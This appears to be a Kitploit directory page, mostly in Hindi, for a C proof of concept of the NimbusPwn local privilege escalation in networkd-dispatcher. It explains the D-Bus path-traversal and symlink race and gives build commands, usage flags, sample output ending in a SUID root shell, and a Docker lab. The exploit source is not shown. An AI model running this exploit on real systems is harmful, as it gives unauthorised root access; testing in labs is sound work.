Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
NimbusPWN-CVE-2022-29799-29800 — NimbusPwn (CVE-2022-29799/29800) स्थानीय विशेषाधिकार उन्नयन PoC C में। | Kitploit
उपकरण/GitHubGitHub/joshuavanderpoll/nimbuspwn-cve-2022-29799-29800
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubjoshuavanderpoll/nimbuspwn-cve-2022-29799-29800

NimbusPWN-CVE-2022-29799-29800

NimbusPwn (CVE-2022-29799/29800) स्थानीय विशेषाधिकार उन्नयन PoC C में।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
52 महीने पहलेअभी तक समीक्षित नहीं

NimbusPwn — networkd-dispatcher < 2.1 स्थानीय विशेषाधिकार वृद्धि (CVE-2022-29799 / CVE-2022-29800) PoC

C Linux

📜 विवरण

NimbusPwn के लिए एक C PoC, networkd-dispatcher में एक स्थानीय विशेषाधिकार वृद्धि। एक अनअप्रिविलेज्ड उपयोगकर्ता org.freedesktop.network1 D-Bus नाम का दावा करता है और एक क्राफ्टेड OperationalState भेजता है। रूट डेमॉन इसे सैनिटाइज़ नहीं करता (CVE-2022-29799, पथ ट्रैवर्सल), और स्क्रिप्ट निर्देशिका पर एक सिमलिंक रेस (CVE-2022-29800, TOCTOU) इसे हमलावर द्वारा रोपित स्क्रिप्ट को रूट के रूप में चलाने पर मजबूर करता है — एक SUID रूट शेल गिराता है।

प्रभावित: networkd-dispatcher < 2.1 (2.1 में ठीक किया गया)। केवल Linux. आवश्यकता: सिस्टम D-Bus और एक दावा करने योग्य org.freedesktop.network1 नाम।

🛠️ स्थापना

Linux (Kali, या लक्ष्य बॉक्स) पर बनाएँ। यह macOS/Windows पर नहीं बनता या चलता।

root@kitploit:~
git clone https://github.com/joshuavanderpoll/NimbusPWN-CVE-2022-29799-29800.git
cd NimbusPWN-CVE-2022-29799-29800
sudo apt install -y gcc libc6-dev libdbus-1-dev pkg-config
cc nimbuspwn.c -o nimbuspwn $(pkg-config --cflags --libs dbus-1)

[!NOTE] अन्य डिस्ट्रो: dnf install gcc dbus-devel pkgconf (Fedora/RHEL) या pacman -S gcc dbus pkgconf (Arch)। कंपाइल लाइन वही है।

⚙️ उपयोग

एक असुरक्षित होस्ट पर एक अनअप्रिविलेज्ड उपयोगकर्ता के रूप में चलाएँ।

root@kitploit:~
./nimbuspwn [-c] [-s SHELL]
  -c, --check        non-breaking vuln check, no exploitation
  -s, --shell SHELL  shell to SUID-copy and spawn as root (default /bin/sh)
  -h, --help         show help

पहले जाँचें (सुरक्षित, कुछ नहीं लगाता, कभी रेस नहीं करता):

root@kitploit:~
$ ./nimbuspwn --check
[+] owned org.freedesktop.network1
[+] verdict: likely vulnerable (org.freedesktop.network1 is claimable, no privesc tried)

फिर शोषण करें:

root@kitploit:~
$ ./nimbuspwn
[*] shell=/bin/sh drop=/tmp/sh attempts=10
[+] owned org.freedesktop.network1
[@] attempt 1 (/tmp/nimbuspwn_93732)
[+] planted 126 payloads (root-owned /sbin execs) in /tmp/nimbuspwn_93732
[*] OperationalState: ../../../tmp/nimbuspwn_93732/poc
[*] signal sent (serial 3)
[@] symlink swapped, waiting for root exec
[+] root backdoor at /tmp/sh, spawning shell
# id
uid=1000(pwn) gid=1000(pwn) euid=0(root) groups=1000(pwn)

रेस गैर-नियतात्मक है, इसलिए यह पुनः प्रयास करता है (डिफ़ॉल्ट 10×)। /bin/sh के बिना होस्ट पर -s /bin/bash का उपयोग करें।

🐋 Docker PoC

एक आत्म-निहित असुरक्षित लैब (Ubuntu 20.04 + असुरक्षित networkd-dispatcher 2.0)। कोई --privileged या होस्ट नेटवर्किंग नहीं।

root@kitploit:~
docker compose build
docker compose run --rm nimbuspwn-lab
# inside, as user 'pwn':
./nimbuspwn

2.0 डिस्पैचर docker/ में वेंडर किया गया है, इसलिए बिल्ड किसी बाहरी डाउनलोड पर निर्भर नहीं करता। डिस्पैचर लॉग: /var/log/dispatcher.log।

🕵🏼 संदर्भ

  • Microsoft: https://www.microsoft.com/en-us/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/
  • Upstream: https://gitlab.com/craftyguy/networkd-dispatcher

📢 अस्वीकरण

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। निर्माता उपकरण द्वारा उत्पन्न किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें